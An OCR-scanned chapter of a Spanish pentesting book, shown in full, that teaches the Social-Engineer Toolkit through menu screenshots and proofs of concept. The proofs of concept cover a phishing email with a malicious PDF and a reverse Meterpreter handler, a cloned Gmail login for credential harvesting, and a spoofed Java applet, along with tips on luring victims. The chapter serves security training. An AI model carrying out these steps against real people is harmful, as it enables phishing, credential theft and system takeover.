este  capitulo  pueden  Ilegar  a  ser  muy  avanzados  en  la  actualidad. 

Muchos  especialistas  en  este  tema  piensan  que  la  ingenieria  social  es  uno  de  los  mayores  riesgos  a 
los  que  se  enfrentan  las  empresas  hoy  en  dia,  ya  que  es  realmente  dificil  proteger  a  estas  de  un  ataque 
de  este  estilo.  I 

Un  vector  de  ataque  en  seguridad  informatica  es  la  via  utilizada  para  obtener  acceso,  ya  sea  a  la^ 
maquina  remota,  maquina  local,  informacion,  credenciaies,  etcetera.  SET  clasifica  los  ataques  o! 
veetores  de  ataque  de  la.  siguiente  manera: 

-  Vector  de  ataque:  phishing. 

-  Vector  de  ataque:  web. 

-  Medios  o  dispositivos  infectados. 

-  Payloads  como  ejecutables. 

-  Ataques  por  correo  electronico. 

-  Falsificacibn  de  SMS. 


Los  veetores  de  ataque  mencionados  anteriormente  disponen  de  distinta  tasa  de  exito  realmente 
depende  del  destinatario  y  de  la  calidad  del  ataque.  SET  viene  con  plantillas  de  correo  electrbnico 


Wclcnase  to  the  Social -engineer  Toolkit  (SET) .  Your  one 
stop  shop  for  all  of  your  social- engineering  needs.. 

Derbycon  2811  Sep38-Oct02  -  http://Www.derbycoK.com 

Select  from  the  menu: 

I.  Spear- Phishing  Attack  Vectors 
Website  Attack  Vectors 

3.  Infectious  Media  Generator 

4.  Create  a. Payload  and  Listener 

5.  Mass  fdailer  Attack 

6.  Teensy  USB  HID  Attack  Vector 

7.  SMS  Spoofing  Attack  Vector 

8.  Wireless  Access  Point  Attack  Vector 

9.  Third  Party  Modules 

10.  Update  the  Metasploit  Framework 

II.  Update  the  Social-Engineer  Toolkit 

12.  Help,  Credits,  and  About 

13.  Exit  the  Social -Engineer  Toolkit 

jEnter  your  choice; 

Fig  6.01:  Menu  de  opciones  de  SET. 
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y  sitios  web  por  defecto,  los  cuales  pueden  ser  utilizados  para  realizar  ingenieria  social.  SET  se 
encuentra  disponible  en  la  siguiente  ruta,  en  una  distribucion  BackTrack  5 ,  /pentesi/exploits/set. 


Para  elegir  que  herramienta  realizara  la  tecnica  de  DNS  Spoofing  existe  la  variable  DNSSPOOF _ 
PAW.  Es  interesante  estudiar  esta  tecnica  para  realizar  un  phishing  controlado  por  el  ataeanle  en 
todo  ins  lan te. 


Configuracion  de  SET 

La  configuracion  de  SET  se  puede  realizar  a  traves  del  fichero  de  configuracion  que  se  encuentra 
en  la  ruta  t 'pentest/ 'exploits/set/ 'config/ 'set jconfig.  Existen  distintas  variables  que  deben  estar  bien 
configuradas  para  sacar  el  maximo  provecho  a  SET.  A  continuacion  se  Iran  enunciando  distintas 
variables  que  ayudan  a  aprovechar  las  distintas  opciones  y  vectores  de  ataque  que  SET  consigue 
exp! otar  gracias  a  la  ingenieria  social. 

La  primera  variable  que  se  presenta  es  METASPLOIT _PA TTI.  Esta  variable  indica  a  SET  en  que 
ruta  se  encuentra  instaiado  el  framework  de  Metasploit.  La  variable  SELF_SIGNED  APPLET 
viene  deshabilitada  por  defecto  y  es  reeomendable  activarla.  Esta  variable  indica  si  el  applet  sera 
firmado  con  el  pubticador  que  se  quiera  suplantar,  siempre  y  cuando  el  JDK  se  encuentre  instaiado. 
Esta  variable  se  utiliza  para  el  ataque  de  web  basado  en  el  applet  de  JAVA,  el  cual  se  encuentia 
auto  firmado. 

La  variable  AUTO  DETECT  viene  activada  por  defecto  y  proporciona  la  posibilidad  de  configurar 
automaticamente  la  direceion  IP  que  se  asignara  a  los  servidores  web.  Es  reeomendable  desactivar 
esta  variable  si  se  utilizan  distintas  interfaces  o  si  el  listener  inverse  que  espera  la  conexion  se 
encuentra  en  otra  ubicacion  y  no  en  la  maquina  local. 

La  variable  APACHE -SERVER  viene  deshabilitada  por  defecto,  y  es  reeomendable  activarla  ya  que 
Apache  es  un  servidor  web  muy  potente  y  configurable.  El  servidor  web  que  SET  utiliza  por  defecto 
esta  basado  en  Python  y  con  mends  polencial  que  Apache.  Otra  variable  relacionada  con  Apache 
es  APACHE -DIRECTORY,  la  cual  especifica  en  que  ruta  se  encuentra  instaiado  el  servidor  web 
Apache. 

Otra  variable  interesante  es  WEB_PORT  con  la  que  se  especifica  el  valor  del  puerto  en  el  que  se 
montara  por  defecto  el  servidor  web,  por  ejemplo  del  ataque  del  applet  de  JAVA. 

AUTO -MIGRATE  es  una  variable  muy  importante  en  la  configuracion  de  SET.  Por  defecto  se 
encuentra  desactivada.  Si  esta  variable  se  encuentra  activa,  cuando  se  realice  la  explotacion,  el 
payload  migrara  automaticamente  a  otro  proceso,  como  es  el  creado  por  defecto,  notepacl.exe.  Esta 
configuracion  puede  introducir  ciertos  fallos  en  el  proceso  global,  aunque  aun  asi  es  aconsejable  de 
utilizar. 

La  variable  METASPLOIT JFRAME_PORT  indica  el  puerto  utilizado  para  realizar  un  ataque  de 
iframe  injection  usando  la  tecnica  de  browser  autopwn ,  vista  con  anterioridad  en  esle  libro.  Por 
defecto  el  valor  de  la  variable  es  8080.  Otra  variable  interesante  de  Metasploit  en  el  archivo  de 
configuracion  de  SET  es  METERPRETER_MULTI -COMMANDS  establece  que  comandos  se 
quieren  ejecutar  cuando  una  sesion  de  Melerpreter  es  conseguida. 


La  variable  ACCESS  JOINT _SSID  indica  que  nombre  recibira  el  punto  de  acceso  talseado  con 
SET.  Es  interesante  para  ataques  de  suplantacion  de  AP  o  puntos  de  acceso,  en  los  tlpicos  ataques  de 
ingenieria  social  a  redes  wireless. 

Estos  son  alglrnos  ejemplos  de  variables  importantes  del  fichero  de  configuracion  de  SET.  Como 
se  puede  ver  es  altamenle  reeomendable  visualizarle  ya  que  es  muy  potente  y  puede  cambiar, 
lacilmente,  el  comportamiento  de  la  herramienta. 


3.  Vector  de  ataque:  phisSiing 

Este  vector  de  ataque  automata  el  proceso  de  envlo  de  correos  electronicos,  tanlo  via  Sendmail 
como  Gmail ,  que  llevan  adjuntos  archivos  maliciosos,  los  cuales  contienen  algun  tipo  de  exploit. 
La  victima  recibira  el  correo  electronico  y  puede  abrir  el  archivo  adjunto  provocando  una  posibie 
explotacion  de  su  sistema.  SET  puede  utilizar  ei  protocolo  SMTP  para  realizar  envios  anonimos  de 
correo  electronico  o  utilizar  una  cuenta  de  Gmail  para  realizar  dicha  accion 

En  este  vector  de  ataque  tambien  figura  la  posibilidad  de  enviar  correos  para  realizar  ataques  de 
phishing  mediante  contenido  HTML.  Normaimente,  este  tipo  de  ataques  se  realiza  de  inanera 
masiva,  ya  sea  un  ataque  dirigido  o  no  dirigido. 

Para  poder  realizar  spoofing  del  correo  electronico  en  este  tip0  de  via  se  debe  cambiar  el  valor  de  la 
variable  SENDMAIL ,  la  cual  por  defecto  viene  desactivada  en  e[  fichero  de  configuracion  de  SET, 
por  ei  valor  o«.  De  todos  modos  al  seleccionar  esta  opcion  en  el  menu  de  SET,  la  propia  aplicacion 
comunicara  esta  accion  al  usuario. 


PoC:  Ataque  dirigido  a  un  dominio 

En  esta  prueba  de  concepto  se  utiliza  la  herramienta  SET  para  realizar  un  ataque  de  phishing  via 
correo  electronico.  El  objetivo  es  una  empresa  ficticia  denominada  botijosMostoles.com ,  la  cual 
tiene  en  ptantiila  a  un  gran  numero  de  empleados.  La  accion  a  realizar  sera  enviar  un  gran  numero 
de  mails  al  dominio  de  dicha  empresa  con  un  archivo  malicioso  adjunto,  obteniendo  previamenle 
direcciones  de  correo  electronico  de  dicha  empresa.  Se  sabe  que  la  mayorla  de  los  empleados 
visualizara  el  correo,  pero  no  abriran  el  archivo  adjunto.  Los  usuarios  que  si  ejecuten  ei  archivo 
adjunto  pondran  a  prueba  la  fortaleza  de  sus  sistemas. 

Para  llevar  a  cabo  este  ataque  en  el  menu  de  SET  se  elegira  la  primera  opcion  '‘Spear-Phishing 
Attack  Vectors”. 
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Select  from  the  menu: 

1.  Spear-Phishing  Attack  Vectors 

2.  Website  Attack  Vectors 

3.  Infectious  Media  Generator 

4.  Create  a  Payload  and  Listener 

5.  Mass  Mailer  Attack 

6.  Teensy  US8  HID  Attack  Vector 

7.  SMS  Spoofing  Attack  Vector 

B.  Wireless  Access  Point  Attack  Vector 

9.  Third  Party  Modules 

18.  Update  the  Metasploit  Framework 

11.  Update  the  Social-Engineer  Toolkit 

12.  Help,  Credits,  and  About 

13.  Exit  the  Social -Engineer  Toolkit 

Enter  your  choice:  1 _ 

Fig  6.02:  Eieccion  de  Spear-Phishing  Attack  Vectors 

Tras  la  eieccion  del  vector  de  ataque  se  debe  elegir  entre  varias  opciones: 

-  Perform  a  Mass  Email  Attack.  Realiza  un  envlo  masivo  de  correos  electronicos  sobre  nna 
organization.  Esta  opcion  es  la  valida  en  esta  prueba  de  concepto. 

-  Create  a  FileFormat  Payload.  Crea  ei  archivo  malicioso  y  lo  deja  a  dispon ibi I idad  del 
usuano. 

-  Create  a  Social-Engineering  Template.  Permite  crear  nuevas  plantiHas  para  el  envlo  de 
mails. 


Welcome  to  the  SET  E-Mail  attack  method.  This  module  allows  you 
to  specially  craft  email  messages  and  send  them  to  a  large  (or  small) 
number  of  people  with  attached  fileformat  malicious  payloads.  If  you 
want  to  spoof  your  email  address,  be  sure  "Sendmail"  is  installed  (it 
is  installed  in  BT4)  and  change  the  config/setconfig  5ENDMAIL=0FF  flag 
to  SENDMAIL=ON. 

There  are  two  options,  one  is  getting  your  feet  wet  and  letting  SET  do 
everything  for  you  (option  1),  the  second  is  to  create  your  own  FileFormat 
payload  and  use  it  .in  your  own  attack.  Either  way,  good  luck  and  enjoy! 

1.  Perform  a  Mass  Email  Attack 

2.  Create  a  FileFormat  Payload 

3.  Create  a  Social-Engineering  Template 

4.  Return  to  Main  Menu 

Enter  your  choice:  1 

Fig  6,03:  Eieccion  de  Perform  a  Mass  Email  Attack 

Tras  elegir  el  metodo  de  ataque  que  se  utilizara,  SET  proporciona  una  lista  de  formatos  de  archives 
que  se  pueden  usar  para  adjuntar  al  correo  eiectronico.  En  este  caso  la  eieccion  sera  el  archivo 
PDF  con  el  exploit  Embedded  EXE  Social  Engineering  de  Adobe,  con  el  que  se  creara  un  archivo 
PDF  malicioso  el  cual.  inyectara  un  payload  en  la  maquina  remota,  siempre  y  cuantlo  la  version  de 
Adobe  Reader  sea  vulnerable.  Lo  importante  en  este  punto  es  la  variedad  y,  a  la  vez,  resumen  de 


exploits  que  proporciona  SET  para  el  auditor.  No  hace  falta  recordar  todas  las  posibilidades  para 
crear  arcliivos  maliciosos,  SET  las  ofrece  a  traves  de  menus  con  interaction  con  el  usuario.  1 


Select  the  file  format  exploit  you  want. 

The  default  is  the  PDF  embedded  EXE. 

****##****  payloads  ********** 

1.  SET  Custom  Written  DLL  Hijacking  Attack  Vector  (RAR,  ZIP) 

2.  SET  Custom  Written  Document  UNC  LM  SMB  Capture  Attack 

3.  Microsoft  Windows  CreateSizedDIBSECTION  Stack  Buffer  Overflow 

4.  Microsoft  Word  RTF  pFragments  Stack  Buffer  Overflow  (MS10-887) 

5.  Adobe  Flash  Player  'Button'  Remote  Code  Execution 

6.  Adobe  CoolType  SING  Table  'uniqueName'  Overflow 

7.  Adobe  Flash  Player  'newf unction'  Invalid  Pointer  Use 

8.  Adobe  CoUab,collectEmailInfa  Buffer  Overflow 

9.  Adobe  Collabvgetlcon  Buffer  Overflow 

10.  Adobe  3BIG2Decode  Memory  Corruption  Exploit 

11.  Adobe  PDF  Embedded  EXE  Social  Engineering 

12.  Adobe  util. -print f ()  Buffer  Overflow 

13.  Custom  EXE  to  VBA  (sent  via  RAR)  (RAR  required) 

14.  Adobe  U30  CLODProgressiveMeshDeclaration  Array  Overrun 

15.  Adobe  PDF  Embedded  EXE  Social  Engineering  (NQJS) 

16.  Foxit  PDF  Reader  v4.1.1  Title  Stack  Buffer  Overflow 

17.  Nuance  PDF  Reader  v6,0  Launch  Stack  Buffer  Overflow 

Enter  the  number  you  want  (press  enter  for  default):  11 

Fig  6.04:  Eieccion  de  PDF  Embedded  EXE  Social  Engineering 

Este  tipo  de  ataque  permite  elegir  entre  un  PDF  en  bianco,  el  cual  tras  ejecutarle  no  muestre  ningun 
contenido  pero  si  intente  ejecutar  el  payload,  y  entre  un  PDF  ya  creado  con  anterioridad.  Con  la 
segunda  opcion  se  intenta  dotar  at  PDF  de  mayor  credibilidad  en  el  arte  de  la  ingenieria  social.  Para 
la  prueba  de  concepto  se  utiliza  la  opcion  del  PDF  en  bianco. 


You  have  selected  the  default  payload  creation.  SET  will  generate  a  normal  PDF  with  embedded  EXE 

1.  Use  your  own  PDF  for  attack 

2,  Use  built-in  BLANK  PDF  for  attack 

Enter  your  choice  (return  for  default):  2 

Fig  6.05:  Eieccion  de  PDF  blank 

En  el  siguiente  paso  sc  debe  selcccionar  el  payloadqm  se  quiere  utilizar.  La  eieccion  del  payload, 
eomo  se  ha  mencionado  con  anterioridad  en  este  libro,  es  muy  importante  y  SET  ofrece  una  lista  de 
variantes. 

Los  payloads  disponibles  dependeran  del  exploit  que  se  este  utilizando,  ya  que  hay  que  recordar 
que  no  todos  los  payloads  vaien  para  todos  los  exploits.  En  este  caso  se  utiliza  un  Meterpreter  de 
tipo  reverse  por  TCP.  Con  este  Meterpreter  se  pedira  que  se  indique  el  puerto  al  que  se  conectara  el 
payload,  por  ejemplo  el  4444. 
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Capttulo  VI.  Ingen ieria  social  con  SET 


1.  Windows  Reverse  TCP  Shell 

Spawn 

ker. 

2.  Windows  Heterpreter  Reverse  TCP 

Spawn 

ttacker. 

3.  Windows  Reverse  VNC  DLL 

Spawn 

a  command  shell  on  victim  and  send  back  to  attac 
a  meterpreter  shell  on  victim  and  send  back  to  a 
a  VNC  server  on  victim  and  send  back  to  attacker 


4.  Windows  Reverse  TCP  Shell  (x64) 

5.  Windows  interpreter  ReverseTCP  (X64) 
r 

6.  Windows  Shell  Bind_TCP  (X64) 
system. 

7.  Windows  Heterpreter  Reverse  HTTPS 
preter 


Windows  X64  Command  Shell.  Reverse  TCP  inline 
Connect  back  to  tbe  attacker  (Windows  x64),  Meterprete 

Execute  payload  and  create  an  accepting  port  on  remote 

Tunnel  communication  over  HTTP  using  SSL  and  use  Meter 


Enter  the  payload  you  want  (press  enter  for  default):  2 


Fig  6.06:  Election  de  payload  para  PDF  Embedded  EXE  Social  Engineering 


A  continuaeion  se  pedira  si  se  quiere  utilizar  Sendmaii y  de  este  modo  poder  spoofear  la  direccion  de 
eorreo  electronico  con  la  que  se  quiere  enviar  el  mail.  Tambien  se  indicara  que  el  archivo  malicioso 
se  puede  renombrar  o  dejar  con  el  nombre  por  defecto.  Antes  de  fmaltzar  se  indican  tambien  distinlos 
aspeclos  importantes  como  son  el  numero  de  destinatarios,  es  deck,  si  se  enviara  a  uno  o  sera  tm 
ataque  masivo,  que  plantilia  se  utilizara,  si  sera  una  predefinida  o  se  creara  en  el  acto,  etcetera 


Las  plantillas  de  mail  predefinidas  se  pueden  personalizar  mediante  la  opcion  “Create  a  Social- 
Engineering  Template ",  Es  interesante  visual izar  y  entender  como  funcionan  estas  plantillas  para 
realizar  un  ataque,  por  ejemplo  en  el  idioma  del  atacante  o  del  objeivo. 


Por  ultimo,  se  debe  elegir  si  se  enviara  mediante  una  cuenta  existenle  de  Gmail  o  se  utilizara  un 
servidor  propio  para  realizar  el  envto.  En  esta  prueba  de  concepto  se  utilizara  una  cuenta  de  Gmail, 
creada  previamente  por  el  atacante,  pero  para  dotar  de  mayor  realismo  al  ataque  debena  utilizarse 
un  servidor  propio  con  la  direccion  de  eorreo  spoofeada. 


I*)  Processing  src/program  junk/meta  config  for  ERB  directives.  ” 

resource  (src/program_junk/meta_config)>  use  exploit/multi/handler 

resource  (src/programJunk/meta_canfig)>  set  PAYLOAD  windows/meterpreter/reversc  Up 

PAYLOAD  =>  windows /meterprete r/ reverse  tep 

resource  (src/program_junk/meta_configT>  set  LHOST  192.168.0.56 

LHOST  =>  192.168.0.56 

resource  (src/programjunk/raeta_config)>  set  LPORT  4444 
LPORT  =>  4444 

resource  (sre/program  junk/meta  config)>  set  ENCODING  shikata  ga  nai 
ENCODING  =>  shikataganai 

resource  {src/prograffl_junk/meta_config)>  set  ExitOnSesslon  false 
ExitQnSession  =>  false 

resource  (src/programJunk/meta  config)>  exploit  -j 
(*]  Exploit  running  as  background  job. 
msf  exploit (handler)  > 

ta]  started  reverse  handler  on  192.168.0.56:4444 

[*j  Starting  the  payload  handler... _ 

Fig  6.07:  mulli/handler  monlado  por  SET 


algun  usuario  curioso  ejecuta  dicho  archivo,  y  su  version,  en  este  caso  de  Adobe  Reader,  no  esta 
actual izada,  caera  en  el  engano  y  proporcionara  un  punto  debil  en  la  empresa  boHjosMostoles.com. 


4.  Vector  de  ataque:  web 

Este  vector  de  ataque  es  uno  de  ios  mas  utilizados  en  SET  por  los  usuarios.'Permite  montai  plantillas 
de  sitios  web  o,  incluso,  clonaciones  en  vivo  de  paginas  web.  El  objetivo  de  este  vector  de  ataque 
es  que  el  usuario  que  visita  esta  pagina  web  piense  que  esta  accediendo  al  sitio  real  y  no  a  una 
falsificacion.  Uno  de  los  ataques  mas  famosos  que  proporciona  SET  en  este  vector  de  ataque  es  el 
del  applet  de  JAVA. 

Este  vector  de  ataque  presenta  los  siguientes  ataques: 

-  JAVA  Applet  Attack  Method.  Se  presenta  ai  usuario  que  accede  al  sitio  web  un  applet 
malicioso. 

-  Metasploit  Browser  Exploit  Method.  Tras  recibir  .la  peticion  ejecuta  el  exploit  conllgn  raclo 
previamente  por  el  atacante.  Se  utiliza  un  iframe  el  cual  lanza  el  exploit  sobre  la  maquina  del 
usuario  que  realiza  la  peticion  sobre  el  servidor  web  malicioso. 

-  Credential  Harvester  Attack  Method.  Se  presenta  al  usuario  un  sitio  web,  clonado  del 
•  original.  Cuando  el  usuario  introduce  sus  credenciales,  estas  son  capturadas  por  el  servidor 

web  malicioso. 

-  Tabnabbing  Attack  Method.  Este  ataque  funciona  de  man  era  similar  a  Credential 
Harvester  Attack  Method.  La  unica  diferencia  es  que  cuando  la  victima  accede  al  sitio  web 
configurado  con  este  metodo  obtiene,  en  primer  lugar,  el  mensaje  “ Please  wait  while  (he page 
loads”.  Cuando  el  usuario  cambia  de  pestana,  automaticamente  SET  lo  detecta  y  muestra  el 
sitio  web  malicioso.  De  este  modo  la  victima  cree  que  se  le  solicita  las  credenciales  y  cuando 
las  introduce  SET  hace  la  recoleccion  de  esta  informacion,  provocando  el  engano  sobre  la 
victima. 

-  Man  Left  in  (he  Middle  Attack  Method.  Permite  recolectar  informacion  mediante  la 
interceplacion  de  campos.  Se  necesita  de  una  pagina  web  vulnerada,  en  la  cual  se  inyecta  un 
carnpo  como  <script  src-httpd/direccionServerf . 

.  » 

-  Web  Jacking  Attack  Method.  Este  metodo  presenta  una  pagina  web  con  un  enlace 
que  indica  que  el  sitio  web  ha  sido  movido,  tras  pinchar  en  el  enlace  se  presenta  el  sitio 
web  malicioso  clonado  del  real.  Cuando  la  victima  introduce  las  credenciales,  estas  son 
almacenadas  por  SET  y  la  victima  se  redirige  a  la  pagina  real. 

-  Multi-Attack  Web  Method.  Este  metodo  configura  un  sitio  web  malicioso,  el  cual  dispone 
de  varies  vectores  de  ataque  cuando  la  victima  solicite  la  pagina  web. 


Tras  el  envio  del  eorreo  electronico  se  pregunta  al  usuario  si  se  desea  configurar  automaticamente 
un  handler  para  recibir  las  posibles  conexiones  que  provoque  la  ejecucion  del  archivo  PDF.  Si 


A  continuacion  se  presentan  las  pruebas  de  concepto  mas  utilizadas  y  que  mayor  exito  proporcionan 
a  los  usuarios  realizando  ingenieria  social.  Algunas,  simplemente  montan  el  escenario  io  mas  real 
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posible  para  recolectar  credenciales  c!e  la  victima,  mientras  que  otras  permiten  realizar,  inciuso,  la 
explotacion  del  sistema  de  la  victima  obteniendo  el  control  de  la  maquina. 

PoC:  Recolectando  credenciales 

Esta  tecnica  Iambi en  es  denominada  harvesting  de  credenciales  y  permite  ai  atacante  montar  un 
sitio  web  lo  mas  parecido  al  real  con  el  objetivo  de  recolectar  las  credenciales  de  la  victima,  Antes 
de  comenzar  la  explication  de  la  prueba  de  concepto,  liay  que  recalcar  que  existe  una  variable  en  el 
lie  hero  de  configuracion  de  SET  que  permite  enviar  enlaces  por  correo  eleetronico  a  la  victima,  los 
cuales  liacen  que  esta  acabe  en  el  sitio  web  malicioso.  Esta  variable  es  WRBATTACKJ4AH ,  y  por 
defecto  esta  configurada  en  on. 

Ah  ora  se  procede  a  realizar  la  prueba  de  concepto,  el  escenario  es  el  siguiente: 

-  Ef  atacante  prepara  en  una  maquina  con  BackTracIc  5  un  servidor  web  el  cual  lacilitara  tin 
sitio  web  donde  las  victimas  deberan  insertar  sus  credenciales. 

-  La  victima  accedera  con  su  navegador  a  la  pagina  web  que  sir\e  la  maquina  del  atacante. 

£  Como  hacer  para  que  la  victima  visite  dicha  maquina?  Realmente  dependera  de  donde  se  encuentre 
el  set  vidor  montado.  Si  el  atacante  ha  montado  el  servidor  en  una  maquina  en  su  red  privada,  puede 
que  su  objetivo  real  sea  algun  usuario  de  su  propia  red,  por  lo  que  es  recomendable  utilizar  DNS 
Spoofing  para  conseguir  que  la  victima  termine  accediendo  al  sitio  web  del  atacante  y  no  al  real.  For 
otro  lado,  si  el  atacante  ha  montado  el  servidor  en  una  maquina  de  Internet,  con  su  dominio  real,  es 
recomendable  ulilizar  enlaces  en  otros  srtios  web,  correos  electronicos  masivos  con  enlaces  ai  sitio 
web  malicioso,  o  inciuso  utilizar  redirecciones  desde  otros  posibles  sitios  web  hackeados. 

A  continuation  se  procede  a  realizar  la  configuracion  del  servidor  para  disponer  de  un  sitio  web 
lo  mas  real  al  original.  En  primer  lugar,  tras  ejecutar  SET,  se  debe  elegir  la  option  dos  del  menu 
principal  denominada  ‘'Website Attack  Vectors". 

Select  from  the  menu: 

1.  Spear-Phishing  Attack  Vectors 

2.  Website  Attack  Vectors 

3.  Infectious  Media  Generator 

4.  Create  a  Payload  and  Listener 

5.  Mass  Mailer  Attack 

6.  Teensy  USB  HID  Attack  Vector 

7.  SMS  Spoofing  Attack  Vector 

fl.  Wireless  Access  Point  Attack  Vector 

9.  Third  Party  Modules 

10.  Update  the  Metasploit  Framework 

11.  Update  the  Social-Engineer  Toolkit 

12.  Help,  Credits,  and  About 

13.  Exit  the  Social-Engineer  Toolkit 

Enter  your  choice:  2 _ j 

Fig  6.08:  Eleccion  del  vector  de  ataque  web 
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Tras  elegir  la  opcioiv,  SET  proporciona  information  sobre  los  distintos  ataques  o  tbcnicas  que 
pueden  utilizar  en  este  vector  de  ataque.  Se  selecciona  la  option  “ Credential  Harvester  Attc 
Method"  para  realizar  mas  tarde  la  configuracion  del  sitio  web.  Despues  de  la  selection  de  e 
tecnica  se  debe  indiear  si  se  utilizara  una  plantilla  de  las  que  dispone  SET,  si  se  realizara  t 
donation  en  vivo  de  un  sitio  web  o  si  se  utilizara  un  sitio  imporlado  por  el  atacante.  \ 

1.  The  lava  AppleOttack  Method  *" 

2.  The  Metasploit  Browser  Exploit  Method 

3.  Credential  Harvester  Attack  Method 

4.  Tabnabbing  Attack  Method 

5.  Man  Left  in  the  Middle  Attack  Method 

6.  Web  Jacking  Attack  Method 

7.  Multi-Attack  Web  Method 

8.  Return  to  the  previous  menu 

Enter  your  choice  (press  enter  for  default) :  3 
Fig  6.09:  Eleccion  de  Credential  Harvester  Attack  Method 

[ !  j  Website  Attack  Vectors  [!]  " 

1.  Web  Templates 

2.  Site  Cloner 

3.  Custom  Import 

4.  Return,  to  main  menu 

Enter  number  (1-4):  2 

Email  harvester  will  allow  you  to  utilize  the  clone  capabilities  within  SET 

to  harvest  credentials  or  parameters  from  a  website  as  well  as  place  them  into  a  report. 


pET  supports  both  HTTP  and  HTTPS 
Example:  http: //www. thisisafakesite.com 
Enter  the  url  to  clone:  https://gmail.com 


The  best  way  to  use  this  attack  is  if  username  and  password  form 
fields  are  available.  Regardless,  this  captures  all  POSTs  on  a  website. 

[*3  I  have  read  the  aboye  message.  [*] 

» 

jpress  {return}  to  continue. 

[*!  Social -Engineer  Toolkit  Credential  Harvester  Attack 
jf*j  Credential  Harvester  is  running  on  port  80 

|f*3  Information  will  be  displayed  to  you  as  it  arrives  below: _ 

Fig  6. 10:  Con  ti gurackln  de  la  clonacion  de  un  silio 

Una  vez  que  se  tiene  e!  sitio  web  falso  preparado  en  la  maquina  se  debe  responder  a  la  pregunta 
/,C6mo  hacer  para  que  las  victimas  visiten  ei  sitio  web?  Como  se  mencionaba  anteriormente,  se 
pueden  utilizar  distintos  metodos  como  DNS  Spoofing,  envio  masivo  de  correos  electronicos,  enlaces1 
publicados  en  otros  sitios  web  de  Internet,  etcetera. 
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En  la  propia  interaccion  con  SET  se  pueden  ir  visualizando  las  conexiones  que  las  vlctimas  eslan 
realizando  al  servidor.  Ademas,  SET  ptiede  detec  tar  campos  de  credenciales  por  lo  que  puede  ser 
realmente  facil  obtener  las  credenciales. 


Otra  option  es  capturar  lodo  el  trafico  que  circula  por  la  web  mediante  el  uso  de  un  anaiizador  de 
trafico  en  la  maqttina  del  atacante.  En  esie  caso,  se  encontraran  todas  las  credenciales,  detecte  SET 
los  campos  donde  van  las  credenciales  o  no. 


Como  se  puede  observar  en  la  imagen  la  donation  de  Gmail  se  puede  visualizar  practicamente 
identica  a  la  original.  Es  interesante  ir  probando  distintos  sitios  web,  ya  que  no  todos  se  clonan  con 
la  misnia  calidad. 


Fig  6.12:  Resultado  de  la  clonacion  del  sitio  web  de  Gmail 


En  SET  se  obtienen  unos  informes  sobre  el  ataque  realizado,  con  la  informacion  obtenida  a  traves  de 
este.  Estos  informes  o  reportes  son  localizados  en  la  ruta  /pentest/exploits/set/reporls  y  presehtados 
en  formato  HTML  y  XML.  En  la  pagina  siguiente  se  muestra  un  listado  con  los  parametros  HTTP 
que  hail  sido  capturados  y  que  se  incluiran  en  el  informe. 
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PoC:  JAVA  applet 

Es  interesante  entender  que  la  ingenieria  social  se  basa  en  la  conlianza  de  la  genie,  en  el 
desconocimiento  general  de  las  nuevas  tecnologlas  y  en  el  uso  inapropiado  de  los  dispositivos  de 
hoy  en  dla.  Por  esta  razon,  cualquier  usuario  podrla  ejecutar  dicha  prueba  ue  concepto  o  ser  viclima 
de  eila.  Es  importante  concienciar  a  los  usuarios  menos  avanzados  o  con  menor  interaccion  con 
lqs  nuevas  tecnoiogias  para  evitar  estas  posibies  tecnicas,  por  lo  que  si,  generalmente,  un  sitio  web 
como  Gmail ,  Google ,  Microsoft,  etcetera,  nunca  pidieron  que  se  ejecutara  un  applet  tie  JAVA,  { Por 
que  io  pedirian  aliora?  El  uso  del  sentido  comun  es  la  herramienta  para  eombatir  la  ingenieria  social, 
para  conseguir  que  estas  pruebas  de  concepto,  e  ineluso  explotaciones,  no  lleguen  a  buen  puerto. 

En  esta  prueba  de  concepto  se  presenta  el  escenario  en  el  que  el  atacante  configura  un  servidor  web, 
el  cual  servira  un  sitio  web  conocido  por  los  usuarios  de  Internet,  Cuando  cualquier  usuario  solieite 
el  sitio  web  alojado  en  este  servidor  web,  se  mostrara  la  pagina  web  a  la  vez  que  un  applet  de  JAVA. 
Si  el  usuario  acepta  el  applet  realmente  estara  ejecutando  un  payload  en  su  maquina,  si  endo  victima 
de  un  ataque  de  ingenieria  social  a  traves  de  tecnoiogias  conocidas. 

El  atacante  puede  confgurar  el  applet  a  su  gusto,  por  ejemplo  pudiendo  elegir  el  nombre  de  este,  o 
indicar  que  el  editor  del  applet  scan  empresas  como  Microsoft,  Google,  Apple,  etcetera.  Este  ataque 
del  applet  se  puede  incorporar  a  la  tecnica  de  envio  masivo  de  correos  electronicos  si  se  configura  la 
variable  WEBATTACK_EMAIL  a  on  en  el  fichero  de  configuracion  de  SET. 

Un  ejemplo  real  sen'a  utilizar  tin  dominio  parecido  al  de  una  empresa  real  o  un  sitio  reconocido  por 
los  usuarios  de  Internet.  Se  podrlan  enviar  correos  electronicos  de  manera  masiva  eniazando  en  el 
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contenido  did  correo  al  sitio  web  que-  supianta  al  original  tanto  en  contenido  como  en  el  dominio. 
Ademas,  la  publication  de  links  en  foros  o  sitios  publicos  apuntando  a  esta  imitacion  tambien  podrla 
ayudar,  y  mucho,  para  conseguir  que  los  usuarios  aceedan  al  sitio  v/eb  mallei  oso. 

La  configuration  del  applet  de  JAVA  en  SET  es  realmente  sencilla  como  se  podra  estudiar  a 
continuacton.  En  el  menu  principal  de  SET  se  debe  elegir  )a  option  “Website  Attack  Vectors”,  tal 
y  como  se  reaiizo  anteriormente  en  el  ataque  de  recoleccion  de  credenciales.  En  el  siguiente  menu 
se  presen Urn  los  distintos  ataques  de  este  vector,  y  se  debe  elegir  el  primero  que  es  el  del  applet  de 

JAVA.  i 


1.  The  Java  Applet  Attack  Method 

2.  The  Metasploit  Browser  Exploit  Method 

3.  Credential  Harvester  Attack  Method 

4.  Tabnabbing  Attack  Method 

5.  Han  left  in  the  Middle  Attack  Method 
5.  Web  Jacking  Attack  Method 

7.  Multi*Attack  Web  Method 

8.  Return  to  the  previous  menu 

Enter  your  choice  (press  enter  for  default);  1 


Fig  6.14:  Eleccion  dei  ataque  applet  de  JAVA 


Tras  la  eleccion  del  metodo  de  ataque  se  debe  seieccionar  si  se  realizara  una  donation  de  un  sitio 
web  m  e!  acto  o  si  se  utilizara  una  planttlia  predefinida  en  SET.  Para  este  ejemplo  se  clonara  la 
siguiente  URL  http://yyvinv.mformatica64.com. 

Despues  de  indiear  la  web,  y  si  es  laprimera  vez  que  se  configura  este  ataque  se  pedira  information 
para  crear  un  certificado  con  el  que  JAVA  firmara  el  applet ,  y  de  este  modo  intentar  que  cuando  se 
provoque  el  aviso  de  la  ejecucion  dei  Applet  sea  lo  mas  crei'ble  posible 


